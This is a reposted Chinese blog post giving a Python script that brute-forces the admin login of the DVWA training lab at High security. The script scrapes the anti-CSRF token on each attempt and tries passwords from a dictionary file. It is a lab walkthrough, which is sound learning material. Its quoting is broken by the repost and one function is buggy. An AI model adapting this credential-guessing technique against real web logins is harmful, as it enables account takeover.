Brute Force-python

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Brute Force-python相关的知识,希望对你有一定的参考价值。

本篇文章主要围绕DVWA渗透测试平台,暴力破解-High级别

分析部分略去,直接上脚本代码:

coding:utf-8
#author:freem

import requests
from bs4 import BeautifulSoup
import urllib

header={
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Accept-Encoding:gzip, deflate,
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3,
Cookie:security=high; PHPSESSID=5jr7egbt0r324aklohb699u2q1,
Host:192.168.207.129,
Referer:http://192.168.207.129/DVWA/vulnerabilities/brute/index.php,
Upgrade-Insecure-Requests:1,
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0,
Connection: keep-alive
} #headers
def get_content(request_url,headers): #用于请求
    try:
        if request_url is None:
            return ""
        response=requests.get(request_url,headers=headers,timeout=20)
        response.raise_for_status()
        response.encoding=response.apparent_encoding
        return response.text
        # print(len(response.text))
        # print(response.text)
    except :
        print("Please be careful of exception!")
        print(requests.ConnectionError.strerror)
def get_detail(url):
    try:
        if url is None:
            return ""
        response=requests.get(url,timeout=20)
        response.raise_for_status()
        response.encoding=response.apparent_encoding
        return response.text
        # print(response.text)
    except :
        print("Please be careful of exception!")
        print(requests.ConnectionError.strerror)
def get_taken(url,content):  #用于获取
    if url is None or content is None:
        return None
    soup=BeautifulSoup(content,html.parser)
    taken=soup.find(form).find(input,type="hidden")
    # print(taken)
    user_taken=taken[value]
    # print(type(user_taken))
    return user_taken

def brute_force(user_taken,passwd,successful_check,header):  #单个页面破解
    brute_url=http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password=123456789&Login=Login&user_token=+user_taken
    brute_page=requests.get(brute_url,headers=header).text
    # print(brute_page)
    if successful_check in brute_page:
        print("username:admin\\n+password:"+passwd+"\\n brute_force successufl!")
    else:
        print("failed ~~~~~~~~")

def brute_force_dir(user_taken,file,successful_check,header): #字典破解
    with open(file,r) as f: #打开字典文件
        for line in f:
            passwd=line  #每次读取一行,并且赋值给passwd作为密码,带入url
            brute_url=http://192.168.207.129/DVWA/vulnerabilities/brute/?username=admin&password=+passwd.strip()+&Login=Login&user_token=+user_taken
            print(brute_url)
            brute_page=get_content(brute_url,header)
            user_taken = get_taken(brute_url, brute_page) #或许当前user_taken 值
            # print(user_taken)
            print(len(brute_page))
            if successful_check in brute_page:   #如果匹配成功,给出成功提示
                print("username:admin\\npassword:"+passwd+"\\n brute_force successufl!")
            else:
                print("username:admin\\npassword:"+passwd+"\\n brute_force faild~~") #匹配失败


url=http://192.168.207.129/DVWA/vulnerabilities/brute/
successful_check="Welcome to the password protected area"
content=get_content(url,header)
print(len(content))
# print(content)
user_taken=get_taken(url,content)
password="ppp.txt" #字典文件ppp.txt
# password="123456789"
# brute_force(url,user_taken,password,successful_check,header)
brute_force_dir(user_taken,password,successful_check,header)

结果如下:

技术分享

 

以上是关于Brute Force-python的主要内容,如果未能解决你的问题,请参考以下文章

DWVA系列-1-brute

简单字符串匹配 Brute

Brute-force Algorithm(hdu3221)

python Python Brute Force SSH

python Python Brute Force SSH

Brute Force